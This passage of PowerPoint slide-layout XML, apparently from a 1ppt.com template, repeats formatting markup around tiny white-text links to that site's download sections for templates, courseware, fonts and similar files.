              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout65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65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65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65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66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66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66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66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66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66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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout66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66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66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66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67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67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67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67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67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67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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout67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67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67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67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68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68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68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68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68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68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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
